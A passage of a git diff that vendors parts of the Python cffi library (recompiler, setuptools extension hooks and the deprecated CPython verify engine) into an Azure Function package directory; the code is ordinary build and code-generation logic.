self.cffi_types[index] = CffiOp(OP_ARRAY, item_index) + self.cffi_types[index + 1] = CffiOp(None, str(tp.length)) + + def _emit_bytecode_StructType(self, tp, index): + struct_index = self._struct_unions[tp] + self.cffi_types[index] = CffiOp(OP_STRUCT_UNION, struct_index) + _emit_bytecode_UnionType = _emit_bytecode_StructType + + def _emit_bytecode_EnumType(self, tp, index): + enum_index = self._enums[tp] + self.cffi_types[index] = CffiOp(OP_ENUM, enum_index) + + +if sys.version_info >= (3,): + NativeIO = io.StringIO +else: + class NativeIO(io.BytesIO): + def write(self, s): + if isinstance(s, unicode): + s = s.encode('ascii') + super(NativeIO, self).write(s) + +def _make_c_or_py_source(ffi, module_name, preamble, target_file, verbose): + if verbose: + print("generating %s" % (target_file,)) + recompiler = Recompiler(ffi, module_name, + target_is_python=(preamble is None)) + recompiler.collect_type_table() + recompiler.collect_step_tables() + f = NativeIO() + recompiler.write_source_to_f(f, preamble) + output = f.getvalue() + try: + with open(target_file, 'r') as f1: + if f1.read(len(output) + 1) != output: + raise IOError + if verbose: + print("(already up-to-date)") + return False # already up-to-date + except IOError: + tmp_file = '%s.~%d' % (target_file, os.getpid()) + with open(tmp_file, 'w') as f1: + f1.write(output) + try: + os.rename(tmp_file, target_file) + except OSError: + os.unlink(target_file) + os.rename(tmp_file, target_file) + return True + +def make_c_source(ffi, module_name, preamble, target_c_file, verbose=False): + assert preamble is not None + return _make_c_or_py_source(ffi, module_name, preamble, target_c_file, + verbose) + +def make_py_source(ffi, module_name, target_py_file, verbose=False): + return _make_c_or_py_source(ffi, module_name, None, target_py_file, + verbose) + +def _modname_to_file(outputdir, modname, extension): + parts = modname.split('.') + try: + os.makedirs(os.path.join(outputdir, *parts[:-1])) + except OSError: + pass + parts[-1] += extension + return os.path.join(outputdir, *parts), parts + + +# Aaargh. Distutils is not tested at all for the purpose of compiling +# DLLs that are not extension modules. Here are some hacks to work +# around that, in the _patch_for_*() functions... 
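+# Illustrative sketch (hypothetical names, added for clarity): the
+# patchlist idiom below records (cls, name, old_method) triples so every
+# monkey-patch can be undone in reverse order once compilation is done:
+# patchlist = []
+# _patch_meth(patchlist, SomeCompilerClass, 'some_method', replacement)
+# try:
+# ... # compile with the patched distutils behavior
+# finally:
+# _unpatch_meths(patchlist)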
+ +def _patch_meth(patchlist, cls, name, new_meth): + old = getattr(cls, name) + patchlist.append((cls, name, old)) + setattr(cls, name, new_meth) + return old + +def _unpatch_meths(patchlist): + for cls, name, old_meth in reversed(patchlist): + setattr(cls, name, old_meth) + +def _patch_for_embedding(patchlist): + if sys.platform == 'win32': + # we must not remove the manifest when building for embedding! + from distutils.msvc9compiler import MSVCCompiler + _patch_meth(patchlist, MSVCCompiler, '_remove_visual_c_ref', + lambda self, manifest_file: manifest_file) + + if sys.platform == 'darwin': + # we must not make a '-bundle', but a '-dynamiclib' instead + from distutils.ccompiler import CCompiler + def my_link_shared_object(self, *args, **kwds): + if '-bundle' in self.linker_so: + self.linker_so = list(self.linker_so) + i = self.linker_so.index('-bundle') + self.linker_so[i] = '-dynamiclib' + return old_link_shared_object(self, *args, **kwds) + old_link_shared_object = _patch_meth(patchlist, CCompiler, + 'link_shared_object', + my_link_shared_object) + +def _patch_for_target(patchlist, target): + from distutils.command.build_ext import build_ext + # if 'target' is different from '*', we need to patch some internal + # method to just return this 'target' value, instead of having it + # built from module_name + if target.endswith('.*'): + target = target[:-2] + if sys.platform == 'win32': + target += '.dll' + elif sys.platform == 'darwin': + target += '.dylib' + else: + target += '.so' + _patch_meth(patchlist, build_ext, 'get_ext_filename', + lambda self, ext_name: target) + + +def recompile(ffi, module_name, preamble, tmpdir='.', call_c_compiler=True, + c_file=None, source_extension='.c', extradir=None, + compiler_verbose=1, target=None, debug=None, **kwds): + if not isinstance(module_name, str): + module_name = module_name.encode('ascii') + if ffi._windows_unicode: + ffi._apply_windows_unicode(kwds) + if preamble is not None: + embedding = (ffi._embedding is not None) + if embedding: + ffi._apply_embedding_fix(kwds) + if c_file is None: + c_file, parts = _modname_to_file(tmpdir, module_name, + source_extension) + if extradir: + parts = [extradir] + parts + ext_c_file = os.path.join(*parts) + else: + ext_c_file = c_file + # + if target is None: + if embedding: + target = '%s.*' % module_name + else: + target = '*' + # + ext = ffiplatform.get_extension(ext_c_file, module_name, **kwds) + updated = make_c_source(ffi, module_name, preamble, c_file, + verbose=compiler_verbose) + if call_c_compiler: + patchlist = [] + cwd = os.getcwd() + try: + if embedding: + _patch_for_embedding(patchlist) + if target != '*': + _patch_for_target(patchlist, target) + if compiler_verbose: + if tmpdir == '.': + msg = 'the current directory is' + else: + msg = 'setting the current directory to' + print('%s %r' % (msg, os.path.abspath(tmpdir))) + os.chdir(tmpdir) + outputfilename = ffiplatform.compile('.', ext, + compiler_verbose, debug) + finally: + os.chdir(cwd) + _unpatch_meths(patchlist) + return outputfilename + else: + return ext, updated + else: + if c_file is None: + c_file, _ = _modname_to_file(tmpdir, module_name, '.py') + updated = make_py_source(ffi, module_name, c_file, + verbose=compiler_verbose) + if call_c_compiler: + return c_file + else: + return None, updated + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/setuptools_ext.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/setuptools_ext.py new file mode 
100644 index 0000000..5df6494 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/setuptools_ext.py @@ -0,0 +1,219 @@ +import os +import sys + +try: + basestring +except NameError: + # Python 3.x + basestring = str + +def error(msg): + from distutils.errors import DistutilsSetupError + raise DistutilsSetupError(msg) + + +def execfile(filename, glob): + # We use execfile() (here rewritten for Python 3) instead of + # __import__() to load the build script. The problem with + # a normal import is that in some packages, the intermediate + # __init__.py files may already try to import the file that + # we are generating. + with open(filename) as f: + src = f.read() + src += '\n' # Python 2.6 compatibility + code = compile(src, filename, 'exec') + exec(code, glob, glob) + + +def add_cffi_module(dist, mod_spec): + from cffi.api import FFI + + if not isinstance(mod_spec, basestring): + error("argument to 'cffi_modules=...' must be a str or a list of str," + " not %r" % (type(mod_spec).__name__,)) + mod_spec = str(mod_spec) + try: + build_file_name, ffi_var_name = mod_spec.split(':') + except ValueError: + error("%r must be of the form 'path/build.py:ffi_variable'" % + (mod_spec,)) + if not os.path.exists(build_file_name): + ext = '' + rewritten = build_file_name.replace('.', '/') + '.py' + if os.path.exists(rewritten): + ext = ' (rewrite cffi_modules to [%r])' % ( + rewritten + ':' + ffi_var_name,) + error("%r does not name an existing file%s" % (build_file_name, ext)) + + mod_vars = {'__name__': '__cffi__', '__file__': build_file_name} + execfile(build_file_name, mod_vars) + + try: + ffi = mod_vars[ffi_var_name] + except KeyError: + error("%r: object %r not found in module" % (mod_spec, + ffi_var_name)) + if not isinstance(ffi, FFI): + ffi = ffi() # maybe it's a function instead of directly an ffi + if not isinstance(ffi, FFI): + error("%r is not an FFI instance (got %r)" % (mod_spec, + type(ffi).__name__)) + if not hasattr(ffi, '_assigned_source'): + error("%r: the set_source() method was not called" % (mod_spec,)) + module_name, source, source_extension, kwds = ffi._assigned_source + if ffi._windows_unicode: + kwds = kwds.copy() + ffi._apply_windows_unicode(kwds) + + if source is None: + _add_py_module(dist, ffi, module_name) + else: + _add_c_module(dist, ffi, module_name, source, source_extension, kwds) + +def _set_py_limited_api(Extension, kwds): + """ + Add py_limited_api to kwds if setuptools >= 26 is in use. + Do not alter the setting if it already exists. + Setuptools takes care of ignoring the flag on Python 2 and PyPy. + + CPython itself should ignore the flag in a debugging version + (by not listing .abi3.so in the extensions it supports), but + it doesn't so far, creating troubles. That's why we check + for "not hasattr(sys, 'gettotalrefcount')" (the 2.7 compatible equivalent + of 'd' not in sys.abiflags). (http://bugs.python.org/issue28401) + + On Windows, with CPython <= 3.4, it's better not to use py_limited_api + because virtualenv *still* doesn't copy PYTHON3.DLL on these versions. + Recently (2020) we started shipping only >= 3.5 wheels, though. So + we'll give it another try and set py_limited_api on Windows >= 3.5. 
+ """ + from cffi import recompiler + + if ('py_limited_api' not in kwds and not hasattr(sys, 'gettotalrefcount') + and recompiler.USE_LIMITED_API): + import setuptools + try: + setuptools_major_version = int(setuptools.__version__.partition('.')[0]) + if setuptools_major_version >= 26: + kwds['py_limited_api'] = True + except ValueError: # certain development versions of setuptools + # If we don't know the version number of setuptools, we + # try to set 'py_limited_api' anyway. At worst, we get a + # warning. + kwds['py_limited_api'] = True + return kwds + +def _add_c_module(dist, ffi, module_name, source, source_extension, kwds): + from distutils.core import Extension + # We are a setuptools extension. Need this build_ext for py_limited_api. + from setuptools.command.build_ext import build_ext + from distutils.dir_util import mkpath + from distutils import log + from cffi import recompiler + + allsources = ['$PLACEHOLDER'] + allsources.extend(kwds.pop('sources', [])) + kwds = _set_py_limited_api(Extension, kwds) + ext = Extension(name=module_name, sources=allsources, **kwds) + + def make_mod(tmpdir, pre_run=None): + c_file = os.path.join(tmpdir, module_name + source_extension) + log.info("generating cffi module %r" % c_file) + mkpath(tmpdir) + # a setuptools-only, API-only hook: called with the "ext" and "ffi" + # arguments just before we turn the ffi into C code. To use it, + # subclass the 'distutils.command.build_ext.build_ext' class and + # add a method 'def pre_run(self, ext, ffi)'. + if pre_run is not None: + pre_run(ext, ffi) + updated = recompiler.make_c_source(ffi, module_name, source, c_file) + if not updated: + log.info("already up-to-date") + return c_file + + if dist.ext_modules is None: + dist.ext_modules = [] + dist.ext_modules.append(ext) + + base_class = dist.cmdclass.get('build_ext', build_ext) + class build_ext_make_mod(base_class): + def run(self): + if ext.sources[0] == '$PLACEHOLDER': + pre_run = getattr(self, 'pre_run', None) + ext.sources[0] = make_mod(self.build_temp, pre_run) + base_class.run(self) + dist.cmdclass['build_ext'] = build_ext_make_mod + # NB. multiple runs here will create multiple 'build_ext_make_mod' + # classes. Even in this case the 'build_ext' command should be + # run once; but just in case, the logic above does nothing if + # called again. + + +def _add_py_module(dist, ffi, module_name): + from distutils.dir_util import mkpath + from setuptools.command.build_py import build_py + from setuptools.command.build_ext import build_ext + from distutils import log + from cffi import recompiler + + def generate_mod(py_file): + log.info("generating cffi module %r" % py_file) + mkpath(os.path.dirname(py_file)) + updated = recompiler.make_py_source(ffi, module_name, py_file) + if not updated: + log.info("already up-to-date") + + base_class = dist.cmdclass.get('build_py', build_py) + class build_py_make_mod(base_class): + def run(self): + base_class.run(self) + module_path = module_name.split('.') + module_path[-1] += '.py' + generate_mod(os.path.join(self.build_lib, *module_path)) + def get_source_files(self): + # This is called from 'setup.py sdist' only. Exclude + # the generate .py module in this case. 
+ saved_py_modules = self.py_modules + try: + if saved_py_modules: + self.py_modules = [m for m in saved_py_modules + if m != module_name] + return base_class.get_source_files(self) + finally: + self.py_modules = saved_py_modules + dist.cmdclass['build_py'] = build_py_make_mod + + # distutils and setuptools have no notion I could find of a + # generated python module. If we don't add module_name to + # dist.py_modules, then things mostly work but there are some + # combination of options (--root and --record) that will miss + # the module. So we add it here, which gives a few apparently + # harmless warnings about not finding the file outside the + # build directory. + # Then we need to hack more in get_source_files(); see above. + if dist.py_modules is None: + dist.py_modules = [] + dist.py_modules.append(module_name) + + # the following is only for "build_ext -i" + base_class_2 = dist.cmdclass.get('build_ext', build_ext) + class build_ext_make_mod(base_class_2): + def run(self): + base_class_2.run(self) + if self.inplace: + # from get_ext_fullpath() in distutils/command/build_ext.py + module_path = module_name.split('.') + package = '.'.join(module_path[:-1]) + build_py = self.get_finalized_command('build_py') + package_dir = build_py.get_package_dir(package) + file_name = module_path[-1] + '.py' + generate_mod(os.path.join(package_dir, file_name)) + dist.cmdclass['build_ext'] = build_ext_make_mod + +def cffi_modules(dist, attr, value): + assert attr == 'cffi_modules' + if isinstance(value, basestring): + value = [value] + + for cffi_module in value: + add_cffi_module(dist, cffi_module) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/vengine_cpy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/vengine_cpy.py new file mode 100644 index 0000000..8c26db0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/vengine_cpy.py @@ -0,0 +1,1076 @@ +# +# DEPRECATED: implementation for ffi.verify() +# +import sys, imp +from . import model +from .error import VerificationError + + +class VCPythonEngine(object): + _class_key = 'x' + _gen_python_module = True + + def __init__(self, verifier): + self.verifier = verifier + self.ffi = verifier.ffi + self._struct_pending_verification = {} + self._types_of_builtin_functions = {} + + def patch_extension_kwds(self, kwds): + pass + + def find_module(self, module_name, path, so_suffixes): + try: + f, filename, descr = imp.find_module(module_name, path) + except ImportError: + return None + if f is not None: + f.close() + # Note that after a setuptools installation, there are both .py + # and .so files with the same basename. The code here relies on + # imp.find_module() locating the .so in priority. + if descr[0] not in so_suffixes: + return None + return filename + + def collect_types(self): + self._typesdict = {} + self._generate("collecttype") + + def _prnt(self, what=''): + self._f.write(what + '\n') + + def _gettypenum(self, type): + # a KeyError here is a bug. please report it! 
:-) + return self._typesdict[type] + + def _do_collect_type(self, tp): + if ((not isinstance(tp, model.PrimitiveType) + or tp.name == 'long double') + and tp not in self._typesdict): + num = len(self._typesdict) + self._typesdict[tp] = num + + def write_source_to_f(self): + self.collect_types() + # + # The new module will have a _cffi_setup() function that receives + # objects from the ffi world, and that calls some setup code in + # the module. This setup code is split in several independent + # functions, e.g. one per constant. The functions are "chained" + # by ending in a tail call to each other. + # + # This is further split in two chained lists, depending on if we + # can do it at import-time or if we must wait for _cffi_setup() to + # provide us with the <ctype> objects. This is needed because we + # need the values of the enum constants in order to build the + # enum <ctype> that we may have to pass to _cffi_setup(). + # + # The following two 'chained_list_constants' items contain + # the head of these two chained lists, as a string that gives the + # call to do, if any. + self._chained_list_constants = ['((void)lib,0)', '((void)lib,0)'] + # + prnt = self._prnt + # first paste some standard set of lines that are mostly '#define' + prnt(cffimod_header) + prnt() + # then paste the C source given by the user, verbatim. + prnt(self.verifier.preamble) + prnt() + # + # call generate_cpy_xxx_decl(), for every xxx found from + # ffi._parser._declarations. This generates all the functions. + self._generate("decl") + # + # implement the function _cffi_setup_custom() as calling the + # head of the chained list. + self._generate_setup_custom() + prnt() + # + # produce the method table, including the entries for the + # generated Python->C function wrappers, which are done + # by generate_cpy_function_method(). + prnt('static PyMethodDef _cffi_methods[] = {') + self._generate("method") + prnt(' {"_cffi_setup", _cffi_setup, METH_VARARGS, NULL},') + prnt(' {NULL, NULL, 0, NULL} /* Sentinel */') + prnt('};') + prnt() + # + # standard init. + modname = self.verifier.get_module_name() + constants = self._chained_list_constants[False] + prnt('#if PY_MAJOR_VERSION >= 3') + prnt() + prnt('static struct PyModuleDef _cffi_module_def = {') + prnt(' PyModuleDef_HEAD_INIT,') + prnt(' "%s",' % modname) + prnt(' NULL,') + prnt(' -1,') + prnt(' _cffi_methods,') + prnt(' NULL, NULL, NULL, NULL') + prnt('};') + prnt() + prnt('PyMODINIT_FUNC') + prnt('PyInit_%s(void)' % modname) + prnt('{') + prnt(' PyObject *lib;') + prnt(' lib = PyModule_Create(&_cffi_module_def);') + prnt(' if (lib == NULL)') + prnt(' return NULL;') + prnt(' if (%s < 0 || _cffi_init() < 0) {' % (constants,)) + prnt(' Py_DECREF(lib);') + prnt(' return NULL;') + prnt(' }') + prnt(' return lib;') + prnt('}') + prnt() + prnt('#else') + prnt() + prnt('PyMODINIT_FUNC') + prnt('init%s(void)' % modname) + prnt('{') + prnt(' PyObject *lib;') + prnt(' lib = Py_InitModule("%s", _cffi_methods);' % modname) + prnt(' if (lib == NULL)') + prnt(' return;') + prnt(' if (%s < 0 || _cffi_init() < 0)' % (constants,)) + prnt(' return;') + prnt(' return;') + prnt('}') + prnt() + prnt('#endif') + + def load_library(self, flags=None): + # XXX review all usages of 'self' here! 
+ # import it as a new extension module + imp.acquire_lock() + try: + if hasattr(sys, "getdlopenflags"): + previous_flags = sys.getdlopenflags() + try: + if hasattr(sys, "setdlopenflags") and flags is not None: + sys.setdlopenflags(flags) + module = imp.load_dynamic(self.verifier.get_module_name(), + self.verifier.modulefilename) + except ImportError as e: + error = "importing %r: %s" % (self.verifier.modulefilename, e) + raise VerificationError(error) + finally: + if hasattr(sys, "setdlopenflags"): + sys.setdlopenflags(previous_flags) + finally: + imp.release_lock() + # + # call loading_cpy_struct() to get the struct layout inferred by + # the C compiler + self._load(module, 'loading') + # + # the C code will need the <ctype> objects. Collect them in + # order in a list. + revmapping = dict([(value, key) + for (key, value) in self._typesdict.items()]) + lst = [revmapping[i] for i in range(len(revmapping))] + lst = list(map(self.ffi._get_cached_btype, lst)) + # + # build the FFILibrary class and instance and call _cffi_setup(). + # this will set up some fields like '_cffi_types', and only then + # it will invoke the chained list of functions that will really + # build (notably) the constant objects, as <cdata> objects if they are + # pointers, and store them as attributes on the 'library' object. + class FFILibrary(object): + _cffi_python_module = module + _cffi_ffi = self.ffi + _cffi_dir = [] + def __dir__(self): + return FFILibrary._cffi_dir + list(self.__dict__) + library = FFILibrary() + if module._cffi_setup(lst, VerificationError, library): + import warnings + warnings.warn("reimporting %r might overwrite older definitions" + % (self.verifier.get_module_name())) + # + # finally, call the loaded_cpy_xxx() functions. This will perform + # the final adjustments, like copying the Python->C wrapper + # functions from the module to the 'library' object, and setting + # up the FFILibrary class with properties for the global C variables. 
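+ # Illustrative sketch (hypothetical cdef names, added for clarity):
+ # after this 'loaded' pass, the returned object behaves roughly like
+ # lib = verifier.load_library()
+ # lib.some_function(1, 2) # wrapper copied from the C module
+ # lib.some_global # accessed through a property on FFILibrary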
+ self._load(module, 'loaded', library=library) + module._cffi_original_ffi = self.ffi + module._cffi_types_of_builtin_funcs = self._types_of_builtin_functions + return library + + def _get_declarations(self): + lst = [(key, tp) for (key, (tp, qual)) in + self.ffi._parser._declarations.items()] + lst.sort() + return lst + + def _generate(self, step_name): + for name, tp in self._get_declarations(): + kind, realname = name.split(' ', 1) + try: + method = getattr(self, '_generate_cpy_%s_%s' % (kind, + step_name)) + except AttributeError: + raise VerificationError( + "not implemented in verify(): %r" % name) + try: + method(tp, realname) + except Exception as e: + model.attach_exception_info(e, name) + raise + + def _load(self, module, step_name, **kwds): + for name, tp in self._get_declarations(): + kind, realname = name.split(' ', 1) + method = getattr(self, '_%s_cpy_%s' % (step_name, kind)) + try: + method(tp, realname, module, **kwds) + except Exception as e: + model.attach_exception_info(e, name) + raise + + def _generate_nothing(self, tp, name): + pass + + def _loaded_noop(self, tp, name, module, **kwds): + pass + + # ---------- + + def _convert_funcarg_to_c(self, tp, fromvar, tovar, errcode): + extraarg = '' + if isinstance(tp, model.PrimitiveType): + if tp.is_integer_type() and tp.name != '_Bool': + converter = '_cffi_to_c_int' + extraarg = ', %s' % tp.name + else: + converter = '(%s)_cffi_to_c_%s' % (tp.get_c_name(''), + tp.name.replace(' ', '_')) + errvalue = '-1' + # + elif isinstance(tp, model.PointerType): + self._convert_funcarg_to_c_ptr_or_array(tp, fromvar, + tovar, errcode) + return + # + elif isinstance(tp, (model.StructOrUnion, model.EnumType)): + # a struct (not a struct pointer) as a function argument + self._prnt(' if (_cffi_to_c((char *)&%s, _cffi_type(%d), %s) < 0)' + % (tovar, self._gettypenum(tp), fromvar)) + self._prnt(' %s;' % errcode) + return + # + elif isinstance(tp, model.FunctionPtrType): + converter = '(%s)_cffi_to_c_pointer' % tp.get_c_name('') + extraarg = ', _cffi_type(%d)' % self._gettypenum(tp) + errvalue = 'NULL' + # + else: + raise NotImplementedError(tp) + # + self._prnt(' %s = %s(%s%s);' % (tovar, converter, fromvar, extraarg)) + self._prnt(' if (%s == (%s)%s && PyErr_Occurred())' % ( + tovar, tp.get_c_name(''), errvalue)) + self._prnt(' %s;' % errcode) + + def _extra_local_variables(self, tp, localvars, freelines): + if isinstance(tp, model.PointerType): + localvars.add('Py_ssize_t datasize') + localvars.add('struct _cffi_freeme_s *large_args_free = NULL') + freelines.add('if (large_args_free != NULL)' + ' _cffi_free_array_arguments(large_args_free);') + + def _convert_funcarg_to_c_ptr_or_array(self, tp, fromvar, tovar, errcode): + self._prnt(' datasize = _cffi_prepare_pointer_call_argument(') + self._prnt(' _cffi_type(%d), %s, (char **)&%s);' % ( + self._gettypenum(tp), fromvar, tovar)) + self._prnt(' if (datasize != 0) {') + self._prnt(' %s = ((size_t)datasize) <= 640 ? 
' + 'alloca((size_t)datasize) : NULL;' % (tovar,)) + self._prnt(' if (_cffi_convert_array_argument(_cffi_type(%d), %s, ' + '(char **)&%s,' % (self._gettypenum(tp), fromvar, tovar)) + self._prnt(' datasize, &large_args_free) < 0)') + self._prnt(' %s;' % errcode) + self._prnt(' }') + + def _convert_expr_from_c(self, tp, var, context): + if isinstance(tp, model.PrimitiveType): + if tp.is_integer_type() and tp.name != '_Bool': + return '_cffi_from_c_int(%s, %s)' % (var, tp.name) + elif tp.name != 'long double': + return '_cffi_from_c_%s(%s)' % (tp.name.replace(' ', '_'), var) + else: + return '_cffi_from_c_deref((char *)&%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + elif isinstance(tp, (model.PointerType, model.FunctionPtrType)): + return '_cffi_from_c_pointer((char *)%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + elif isinstance(tp, model.ArrayType): + return '_cffi_from_c_pointer((char *)%s, _cffi_type(%d))' % ( + var, self._gettypenum(model.PointerType(tp.item))) + elif isinstance(tp, model.StructOrUnion): + if tp.fldnames is None: + raise TypeError("'%s' is used as %s, but is opaque" % ( + tp._get_c_name(), context)) + return '_cffi_from_c_struct((char *)&%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + elif isinstance(tp, model.EnumType): + return '_cffi_from_c_deref((char *)&%s, _cffi_type(%d))' % ( + var, self._gettypenum(tp)) + else: + raise NotImplementedError(tp) + + # ---------- + # typedefs: generates no code so far + + _generate_cpy_typedef_collecttype = _generate_nothing + _generate_cpy_typedef_decl = _generate_nothing + _generate_cpy_typedef_method = _generate_nothing + _loading_cpy_typedef = _loaded_noop + _loaded_cpy_typedef = _loaded_noop + + # ---------- + # function declarations + + def _generate_cpy_function_collecttype(self, tp, name): + assert isinstance(tp, model.FunctionPtrType) + if tp.ellipsis: + self._do_collect_type(tp) + else: + # don't call _do_collect_type(tp) in this common case, + # otherwise test_autofilled_struct_as_argument fails + for type in tp.args: + self._do_collect_type(type) + self._do_collect_type(tp.result) + + def _generate_cpy_function_decl(self, tp, name): + assert isinstance(tp, model.FunctionPtrType) + if tp.ellipsis: + # cannot support vararg functions better than this: check for its + # exact type (including the fixed arguments), and build it as a + # constant function pointer (no CPython wrapper) + self._generate_cpy_const(False, name, tp) + return + prnt = self._prnt + numargs = len(tp.args) + if numargs == 0: + argname = 'noarg' + elif numargs == 1: + argname = 'arg0' + else: + argname = 'args' + prnt('static PyObject *') + prnt('_cffi_f_%s(PyObject *self, PyObject *%s)' % (name, argname)) + prnt('{') + # + context = 'argument of %s' % name + for i, type in enumerate(tp.args): + prnt(' %s;' % type.get_c_name(' x%d' % i, context)) + # + localvars = set() + freelines = set() + for type in tp.args: + self._extra_local_variables(type, localvars, freelines) + for decl in sorted(localvars): + prnt(' %s;' % (decl,)) + # + if not isinstance(tp.result, model.VoidType): + result_code = 'result = ' + context = 'result of %s' % name + prnt(' %s;' % tp.result.get_c_name(' result', context)) + prnt(' PyObject *pyresult;') + else: + result_code = '' + # + if len(tp.args) > 1: + rng = range(len(tp.args)) + for i in rng: + prnt(' PyObject *arg%d;' % i) + prnt() + prnt(' if (!PyArg_ParseTuple(args, "%s:%s", %s))' % ( + 'O' * numargs, name, ', '.join(['&arg%d' % i for i in rng]))) + prnt(' return NULL;') + prnt() + # + for i, type 
in enumerate(tp.args): + self._convert_funcarg_to_c(type, 'arg%d' % i, 'x%d' % i, + 'return NULL') + prnt() + # + prnt(' Py_BEGIN_ALLOW_THREADS') + prnt(' _cffi_restore_errno();') + prnt(' { %s%s(%s); }' % ( + result_code, name, + ', '.join(['x%d' % i for i in range(len(tp.args))]))) + prnt(' _cffi_save_errno();') + prnt(' Py_END_ALLOW_THREADS') + prnt() + # + prnt(' (void)self; /* unused */') + if numargs == 0: + prnt(' (void)noarg; /* unused */') + if result_code: + prnt(' pyresult = %s;' % + self._convert_expr_from_c(tp.result, 'result', 'result type')) + for freeline in freelines: + prnt(' ' + freeline) + prnt(' return pyresult;') + else: + for freeline in freelines: + prnt(' ' + freeline) + prnt(' Py_INCREF(Py_None);') + prnt(' return Py_None;') + prnt('}') + prnt() + + def _generate_cpy_function_method(self, tp, name): + if tp.ellipsis: + return + numargs = len(tp.args) + if numargs == 0: + meth = 'METH_NOARGS' + elif numargs == 1: + meth = 'METH_O' + else: + meth = 'METH_VARARGS' + self._prnt(' {"%s", _cffi_f_%s, %s, NULL},' % (name, name, meth)) + + _loading_cpy_function = _loaded_noop + + def _loaded_cpy_function(self, tp, name, module, library): + if tp.ellipsis: + return + func = getattr(module, name) + setattr(library, name, func) + self._types_of_builtin_functions[func] = tp + + # ---------- + # named structs + + _generate_cpy_struct_collecttype = _generate_nothing + def _generate_cpy_struct_decl(self, tp, name): + assert name == tp.name + self._generate_struct_or_union_decl(tp, 'struct', name) + def _generate_cpy_struct_method(self, tp, name): + self._generate_struct_or_union_method(tp, 'struct', name) + def _loading_cpy_struct(self, tp, name, module): + self._loading_struct_or_union(tp, 'struct', name, module) + def _loaded_cpy_struct(self, tp, name, module, **kwds): + self._loaded_struct_or_union(tp) + + _generate_cpy_union_collecttype = _generate_nothing + def _generate_cpy_union_decl(self, tp, name): + assert name == tp.name + self._generate_struct_or_union_decl(tp, 'union', name) + def _generate_cpy_union_method(self, tp, name): + self._generate_struct_or_union_method(tp, 'union', name) + def _loading_cpy_union(self, tp, name, module): + self._loading_struct_or_union(tp, 'union', name, module) + def _loaded_cpy_union(self, tp, name, module, **kwds): + self._loaded_struct_or_union(tp) + + def _generate_struct_or_union_decl(self, tp, prefix, name): + if tp.fldnames is None: + return # nothing to do with opaque structs + checkfuncname = '_cffi_check_%s_%s' % (prefix, name) + layoutfuncname = '_cffi_layout_%s_%s' % (prefix, name) + cname = ('%s %s' % (prefix, name)).strip() + # + prnt = self._prnt + prnt('static void %s(%s *p)' % (checkfuncname, cname)) + prnt('{') + prnt(' /* only to generate compile-time warnings or errors */') + prnt(' (void)p;') + for fname, ftype, fbitsize, fqual in tp.enumfields(): + if (isinstance(ftype, model.PrimitiveType) + and ftype.is_integer_type()) or fbitsize >= 0: + # accept all integers, but complain on float or double + prnt(' (void)((p->%s) << 1);' % fname) + else: + # only accept exactly the type declared. 
+ try: + prnt(' { %s = &p->%s; (void)tmp; }' % ( + ftype.get_c_name('*tmp', 'field %r'%fname, quals=fqual), + fname)) + except VerificationError as e: + prnt(' /* %s */' % str(e)) # cannot verify it, ignore + prnt('}') + prnt('static PyObject *') + prnt('%s(PyObject *self, PyObject *noarg)' % (layoutfuncname,)) + prnt('{') + prnt(' struct _cffi_aligncheck { char x; %s y; };' % cname) + prnt(' static Py_ssize_t nums[] = {') + prnt(' sizeof(%s),' % cname) + prnt(' offsetof(struct _cffi_aligncheck, y),') + for fname, ftype, fbitsize, fqual in tp.enumfields(): + if fbitsize >= 0: + continue # xxx ignore fbitsize for now + prnt(' offsetof(%s, %s),' % (cname, fname)) + if isinstance(ftype, model.ArrayType) and ftype.length is None: + prnt(' 0, /* %s */' % ftype._get_c_name()) + else: + prnt(' sizeof(((%s *)0)->%s),' % (cname, fname)) + prnt(' -1') + prnt(' };') + prnt(' (void)self; /* unused */') + prnt(' (void)noarg; /* unused */') + prnt(' return _cffi_get_struct_layout(nums);') + prnt(' /* the next line is not executed, but compiled */') + prnt(' %s(0);' % (checkfuncname,)) + prnt('}') + prnt() + + def _generate_struct_or_union_method(self, tp, prefix, name): + if tp.fldnames is None: + return # nothing to do with opaque structs + layoutfuncname = '_cffi_layout_%s_%s' % (prefix, name) + self._prnt(' {"%s", %s, METH_NOARGS, NULL},' % (layoutfuncname, + layoutfuncname)) + + def _loading_struct_or_union(self, tp, prefix, name, module): + if tp.fldnames is None: + return # nothing to do with opaque structs + layoutfuncname = '_cffi_layout_%s_%s' % (prefix, name) + # + function = getattr(module, layoutfuncname) + layout = function() + if isinstance(tp, model.StructOrUnion) and tp.partial: + # use the function()'s sizes and offsets to guide the + # layout of the struct + totalsize = layout[0] + totalalignment = layout[1] + fieldofs = layout[2::2] + fieldsize = layout[3::2] + tp.force_flatten() + assert len(fieldofs) == len(fieldsize) == len(tp.fldnames) + tp.fixedlayout = fieldofs, fieldsize, totalsize, totalalignment + else: + cname = ('%s %s' % (prefix, name)).strip() + self._struct_pending_verification[tp] = layout, cname + + def _loaded_struct_or_union(self, tp): + if tp.fldnames is None: + return # nothing to do with opaque structs + self.ffi._get_cached_btype(tp) # force 'fixedlayout' to be considered + + if tp in self._struct_pending_verification: + # check that the layout sizes and offsets match the real ones + def check(realvalue, expectedvalue, msg): + if realvalue != expectedvalue: + raise VerificationError( + "%s (we have %d, but C compiler says %d)" + % (msg, expectedvalue, realvalue)) + ffi = self.ffi + BStruct = ffi._get_cached_btype(tp) + layout, cname = self._struct_pending_verification.pop(tp) + check(layout[0], ffi.sizeof(BStruct), "wrong total size") + check(layout[1], ffi.alignof(BStruct), "wrong total alignment") + i = 2 + for fname, ftype, fbitsize, fqual in tp.enumfields(): + if fbitsize >= 0: + continue # xxx ignore fbitsize for now + check(layout[i], ffi.offsetof(BStruct, fname), + "wrong offset for field %r" % (fname,)) + if layout[i+1] != 0: + BField = ffi._get_cached_btype(ftype) + check(layout[i+1], ffi.sizeof(BField), + "wrong size for field %r" % (fname,)) + i += 2 + assert i == len(layout) + + # ---------- + # 'anonymous' declarations. These are produced for anonymous structs + # or unions; the 'name' is obtained by a 